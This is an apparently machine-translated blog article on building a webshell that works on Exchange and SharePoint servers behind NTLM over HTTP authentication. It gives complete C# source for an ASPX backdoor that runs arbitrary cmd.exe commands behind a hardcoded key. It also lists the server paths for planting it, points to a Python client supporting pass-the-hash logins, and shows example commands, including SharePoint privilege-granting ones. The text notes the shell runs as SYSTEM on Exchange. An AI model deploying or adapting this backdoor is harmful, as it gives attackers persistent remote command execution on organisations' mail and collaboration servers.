Shulou(Shulou.com)06/01 Report--

Today, I will talk to you about how to parse the Webshell implementation that supports NTLM Over HTTP protocol. Many people may not know much about it. In order to let everyone know more, Xiaobian summarizes the following contents for everyone. I hope everyone can gain something according to this article.

In some environments, access to resources on a Web server requires NTLM authentication via NTLM Over HTTP protocol, and when we use Webshell on such Web servers, we need to consider not only the implementation of NTLM authentication, but also the ability to use it from the command line.

0x02 Design Ideas

There are many Web servers that authenticate NTLM over HTTP, such as Exchange and SharePoint.

(1)Exchange Test Environment

Absolute path to save file:

C:\Program Files\Microsoft\Exchange Server\V15\ClientAccess\Autodiscover\test.aspx

The corresponding URL is:

https://URL/Autodiscover/test.aspx

(2)SharePoint Test Environment

Absolute path to save file:

C:\Program Files\Common Files\microsoft shared\Web Server Extensions\15\TEMPLATE\LAYOUTS\test.aspx

The corresponding URL is:

http://URL/_layouts/15/test.aspx

NTLM authentication via NTLM Over HTTP protocol is required to access test.aspx

Here is an example of a webshell that supports cmd commands. The webshell address is:

https://github.com/tennc/webshell/blob/master/aspx/asp.net-backdoors/cmdexec.aspx

as shown below

This webshell needs to be operated through a browser, first complete NTLM authentication, then fill in the correct Auth Key and cmd command to execute.

Our goal is to be able to meet the use of the command line, can be modified as a template, the design idea is as follows:

(1)execCmd.aspx

Receive Form request as parameter to verify Auth Key

If validation fails, return null result

If the validation is successful, execute the incoming cmd command and return the execution result

(2)aspxCmdNTLM.py

command-line scripts

NTLM authentication is first completed through NTLM Over HTTP protocol, where two login methods, plaintext and user password hash, need to be supported.

Send Auth Key and cmd command to be executed through Form request, receive cmd command execution result.

The communication content of execCmd.aspx and aspxCmdNTLM.py is Base64 encoded, and Base64 encoding and decoding need to be considered in program implementation.

0x03 Script Development Details

1.execCmd.aspx

Use the Page_Load method to receive the Form request, where data1 is used as the Auth Key and data2 is used as the cmd command.

Base64 encoding implementation:

byte[] enbytes = Encoding.Default.GetBytes(string1);string string2 = Convert.ToBase64String(enbytes);

Base64 decoding implementation:

byte[] outbyte = Convert.FromBase64String(string1);string string2 = Encoding.Default.GetString(outbyte);

The complete implementation code is as follows:

private const string AUTHKEY = "UGFzc3dvcmQxMjM0NTY3ODk";protected void Page_Load(object sender, EventArgs e) {string data1 = Request.Form["data1"];if (data1 != AUTHKEY){return;}string data2 = Request.Form["data2"];byte[] outbyte = Convert.FromBase64String(data2);string payload = Encoding.Default.GetString(outbyte);string outstr1 = ExecuteCommand(payload);byte[] enbytes = Encoding.Default.GetBytes(outstr1);string outstr2 = Convert.ToBase64String(enbytes);Response.Write(outstr2);}private string ExecuteCommand(string command) {try{ProcessStartInfo processStartInfo = new ProcessStartInfo();processStartInfo.FileName = "cmd.exe";processStartInfo.Arguments = "/c " + command;processStartInfo.RedirectStandardOutput = true;processStartInfo.UseShellExecute = false;Process process = Process.Start(processStartInfo);using (StreamReader streamReader = process.StandardOutput){string ret = streamReader.ReadToEnd();return ret;}}catch (Exception ex){return ex.ToString();}}

2.aspxCmdNTLM.py

NTLM authentication implementation can refer to the previous code:

https://github.com/3gstudent/Homework-of-Python/blob/master/checkEWS.py

Support plaintext and user password hash login

Form requests are sent via POST

Base64 encoding and decoding requires attention to string format

The complete code has been uploaded to github at the following address:

https://github.com/3gstudent/Homework-of-Python/blob/master/aspxCmdNTLM.py

execCmd.aspx needs to be saved on the Web server

aspxCmdNTLM.py is executed at the command line, connect to execCmd.aspx to execute cmd command and get the returned result

aspxCmdNTLM.py supports plaintext and user password hash login

For Exchange servers, the corresponding Webshell permissions are System

as shown below

You can call Exchange PowerShell directly.

Command example:

python aspxCmdNTLM.py 192.168.1.1 443 https://192.168.1.1/Autodiscover/execCmd.aspx plaintext test.com user1 Password123! "powershell -c \"Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn;;Get-MailboxServer\""

The results are shown below

For SharePoint servers, the corresponding Webshell permissions are user permissions

as shown below

Try calling SharePointServer PowerShell

Command example:

python aspxCmdNTLM.py 192.168.1.1 443 https://192.168.1.1/Autodiscover/execCmd.aspx plaintext test.com user1 Password123! "powershell -c \"Add-PSSnapin Microsoft.SharePoint.PowerShell;Get-SPSite\""

Note here that users need to be configured to be able to access the database to be able to execute SharePointServer PowerShell commands

The Powershell command for viewing the list of users who can access the database is as follows:

Add-PSSnapin Microsoft.SharePoint.PowerShell;Get-SPShellAdmin

The Powershell command for adding the specified user access to the database is as follows:

Add-PSSnapin Microsoft.SharePoint.PowerShell;Add-SPShellAdmin Domain\User1

The Powershell command for removing database access privileges for a specified user is as follows:

Add-PSSnapin Microsoft.SharePoint.PowerShell;Remove-SPShellAdmin Domain\User1 -Confirm:$false

Normal results are shown below

After reading the above, do you have any further understanding of how to parse Webshell implementations that support NTLM Over HTTP protocol? If you still want to know more knowledge or related content, please pay attention to the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.